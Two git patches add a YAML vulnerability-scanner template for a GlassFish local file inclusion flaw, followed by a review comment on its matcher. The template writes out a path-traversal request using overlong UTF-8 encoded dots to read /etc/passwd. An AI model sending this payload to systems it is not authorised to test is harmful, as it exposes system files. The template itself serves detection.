From 35e0b8e2f4908d559b421e8cbd6b050117cdfb44 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Tue, 16 Feb 2021 08:38:42 +0000
Subject: [PATCH 1/2] Create oracle-glassfish-lfi.yaml

---
 .../oracle/oracle-glassfish-lfi.yaml | 22 +++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 vulnerabilities/oracle/oracle-glassfish-lfi.yaml

diff --git a/vulnerabilities/oracle/oracle-glassfish-lfi.yaml b/vulnerabilities/oracle/oracle-glassfish-lfi.yaml
new file mode 100644
index 0000000000..2735531047
--- /dev/null
+++ b/vulnerabilities/oracle/oracle-glassfish-lfi.yaml
@@ -0,0 +1,22 @@
+id: glassfish-lfi
+
+info:
+ name: GlassFish LFI
+ author: pikpikcu
+ severity: high
+ tags: oracle,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "/sbin/nologin"
+ part: body
+
+ - type: status
+ status:
+ - 200

From b38e84957eff123e4c900dc7e43b7a7b67f9444e Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Tue, 16 Feb 2021 08:41:11 +0000
Subject: [PATCH 2/2] Update oracle-glassfish-lfi.yaml

---
 vulnerabilities/oracle/oracle-glassfish-lfi.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/vulnerabilities/oracle/oracle-glassfish-lfi.yaml b/vulnerabilities/oracle/oracle-glassfish-lfi.yaml
index 2735531047..65df4b4800 100644
--- a/vulnerabilities/oracle/oracle-glassfish-lfi.yaml
+++ b/vulnerabilities/oracle/oracle-glassfish-lfi.yaml
@@ -4,6 +4,7 @@ info:
 name: GlassFish LFI
 author: pikpikcu
 severity: high
+ reference: https://www.exploit-db.com/exploits/39241
 tags: oracle,lfi

 requests:
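Review bot: The body matcher in the new template keys on the substring `/sbin/nologin`, which is not a reliable signature of /etc/passwd: a host whose accounts all use `/bin/false` or a login shell would be reported clean, and any 200 response that merely mentions the string would be reported vulnerable. Matching the root entry is a tighter check, i.e. `- type: regex` with `regex:` and `- "root:.*:0:0:"`, keeping `part: body` and the status matcher as they are. The `id: glassfish-lfi` also differs from the file name `oracle-glassfish-lfi.yaml`; aligning the two makes a finding easier to trace back to its template. A one-line `#` comment above the path noting that `%c0%ae` is an overlong UTF-8 encoding of `.` would help whoever triages a hit or writes a WAF/IDS rule for this request pattern.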